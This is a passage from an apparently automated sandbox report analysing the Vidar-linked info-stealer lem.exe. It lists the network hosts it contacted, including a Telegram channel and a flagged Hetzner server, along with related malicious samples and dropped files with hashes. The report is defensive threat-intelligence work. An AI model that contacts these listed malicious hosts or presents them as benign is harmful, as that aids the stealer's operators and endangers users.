                                                                                                                                                                                    http://anglebug.com/6439chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://anglebug.com/7406chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://www.google.com/searchchrome.exe, 0000000F.00000003.2154474931.000041300280C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://anglebug.com/7161chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://drive-autopush.corp.google.com/chrome.exe, 0000000F.00000003.2105463335.0000413000480000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://t.me/detct0rPCorrections.com, 0000000A.00000002.2819810606.0000000004430000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.google.com/search?q=$chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://anglebug.com/7162chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    http://anglebug.com/5906chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      http://anglebug.com/2517chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://anglebug.com/4937chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://issuetracker.google.com/166809097chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            http://issuetracker.google.com/200067929chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://lens.google.com/v3/2chrome.exe, 0000000F.00000003.2157553316.0000741C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2100481490.0000741C003A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://anglebug.com/7847chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://google-ohttp-relay-join.fastly-edge.com/chrome.exe, 0000000F.00000003.2100886504.0000741C00694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://lens.google.com/v3/uploadchrome.exe, 0000000F.00000003.2101180327.0000741C006F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2126991788.00004130002F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://anglebug.com/3832chrome.exe, 0000000F.00000003.2115687474.00004130003C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119230641.000041300079C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2119177283.00004130003C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgCorrections.com, 0000000A.00000002.2822025937.000000000468B000.00000004.00000800.00020000.00000000.sdmp, Corrections.com, 0000000A.00000002.2822321159.000000000485E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs
                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                          unknownReserved
                                                                                                                                                                                                                          unknownunknownfalse
                                                                                                                                                                                                                          116.203.12.241
                                                                                                                                                                                                                          sedone.onlineGermany
                                                                                                                                                                                                                          24940HETZNER-ASDEtrue
                                                                                                                                                                                                                          149.154.167.99
                                                                                                                                                                                                                          t.meUnited Kingdom
                                                                                                                                                                                                                          62041TELEGRAMRUfalse
                                                                                                                                                                                                                          142.250.181.132
                                                                                                                                                                                                                          www.google.comUnited States
                                                                                                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                          192.168.2.4
                                                                                                                                                                                                                          127.0.0.1
                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                          Analysis ID:1575515
                                                                                                                                                                                                                          Start date and time:2024-12-15 20:46:07 +01:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 7m 43s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:22
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:lem.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@44/48@5/6
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          • Number of executed functions: 78
                                                                                                                                                                                                                          • Number of non-executed functions: 298
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 217.20.58.100, 192.229.221.95, 172.217.21.35, 172.217.19.206, 64.233.163.84, 172.217.17.46, 172.217.17.67, 52.149.20.212, 23.218.208.109, 13.107.246.63
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, redirector.gvt1.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          • VT rate limit hit for: lem.exe
                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          14:46:59API Interceptor1x Sleep call for process: lem.exe modified
                                                                                                                                                                                                                          14:47:04API Interceptor1x Sleep call for process: Corrections.com modified
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          239.255.255.250Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                                                                                              https://url.us.m.mimecastprotect.com/s/hI-dC2kAwJT85krqxhnf2I5Wy1H?domain=sign.zoho.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  https://fsharetv.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    https://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      DVW8WyapUR.exeGet hashmaliciousSpyrix KeyloggerBrowse
                                                                                                                                                                                                                                        DVW8WyapUR.exeGet hashmaliciousSpyrix KeyloggerBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                              116.203.12.241Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                                                        149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                        http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                        http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                        http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                        http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                        http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • telegram.org/?setln=pl
                                                                                                                                                                                                                                                        http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • telegram.org/
                                                                                                                                                                                                                                                        http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • telegram.dog/
                                                                                                                                                                                                                                                        LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                        • t.me/cinoshibot
                                                                                                                                                                                                                                                        jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                        • t.me/cinoshibot
                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        t.meSetup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        sedone.onlineSetup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        TELEGRAMRUSetup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                                                                                        • 149.154.167.220
                                                                                                                                                                                                                                                        7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        HETZNER-ASDESetup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        https://url.us.m.mimecastprotect.com/s/hI-dC2kAwJT85krqxhnf2I5Wy1H?domain=sign.zoho.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 88.99.216.183
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                                                                        • 138.201.133.159
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        TRC.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                        • 88.99.60.23
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 116.203.10.31
                                                                                                                                                                                                                                                        g8jiNk0ZVv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                        • 195.201.80.82
                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Cryptbot, LummaC Stealer, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, Vidar, XWorm, XmrigBrowse
                                                                                                                                                                                                                                                        • 149.154.167.99
                                                                                                                                                                                                                                                        • 116.203.12.241
                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        C:\ProgramData\2N7Y58YCJW47\TR9Z5XSetup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                          xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                            fim3BhyKXP.gifGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              TMX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                file.exeGet hashmaliciousAmadey, VidarBrowse
                                                                                                                                                                                                                                                                  lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                    ljwIPDSwFi.exeGet hashmaliciousDarkGate, MailPassView, VidarBrowse
                                                                                                                                                                                                                                                                      jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        5CG2133F5Y_2024-04-05_12_15_35.569.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\628056\Corrections.comSetup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                              Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                SET_UP.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                  Set-Up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                    OR8Ti8rf8h.exeGet hashmaliciousAveMaria, DcRat, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                                                                                      nanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                                                        5y2VCFOB05.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2947
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.120077314818075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:22e8T8PvMu0846PYPvJ8+F9gUUL0VlxfMUIgPdunPduZJ0gPdunPduZQ/+lx3cCQ:22X8PvMu0LtPvJPF+0VlVO0z60w+lfah
                                                                                                                                                                                                                                                                                          MD5:C7E301D9DD77A21C1CDBD73A63AF205C
                                                                                                                                                                                                                                                                                          SHA1:715D25AA0C06B2AD162F52A8DE06FB5040C389B1
                                                                                                                                                                                                                                                                                          SHA-256:239C9A49ACDA9FC9845B87819A33D07F359803153FEFFE4D2212989F82DE71E1
                                                                                                                                                                                                                                                                                          SHA-512:B0E6FFB10EF5EB9EB433A23803591C84F603779306E78B1648374218A50D2F77E8EE7215615E9D1BE033A96B735321FCA9D5F7B0CB65661674346FC1546E43FE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. authors="jeffspel".. buildFilter="".. company="Microsoft".. copyright="".. creationTimeStamp="2005-09-13T14:04:43.4054402-07:00".. lastUpdateTimeStamp="2005-09-13T15:39:02.9208750-08:00".. manifestVersion="1.0".. owners="jeffspel".. supportInformation="".. testers="".. >.. <assemblyIdentity.. buildFilter="".. buildType="release".. language="neutral".. name="Microsoft-Windows-Crypto-keys-DL".. processorArchitecture="*".. publicKeyToken="$(Build.WindowsPublicKeyToken)".. type="".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. xmlns="".. scope="Upgrade,MigWiz,USMT".. >.. <migXml xmlns="">.. Check as this is only valid for down-level OS < t
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4533
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1021772201912805
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:22X8PvMu0jPvJPM0UJl1/Qi9XexcElVOaBIpgmQlwYBwkbsgobVu:MUnZUb1xXMV37BhgVu
                                                                                                                                                                                                                                                                                          MD5:477F010FDB6BD5E5E57D6DEC5449F2FB
                                                                                                                                                                                                                                                                                          SHA1:73F9C03AF35B29EC2404BB70FEDC8C9ADADE74F6
                                                                                                                                                                                                                                                                                          SHA-256:2DBEDD5D4D6645E9ED45563FDB1DC42387EF24C9CF5D6A08EC3BE448073C4696
                                                                                                                                                                                                                                                                                          SHA-512:3C630BE96FC7FCD0036D254BA4D197AB31F37F6DAC411F8C78E624B0501D0205AF36CD5A29EC98D96D5D8D88EF2DBB2DF3A62C6F658A93302ECA500B8EC74F2F
                                                                                                                                                                                                                                                                                          Malicious:false
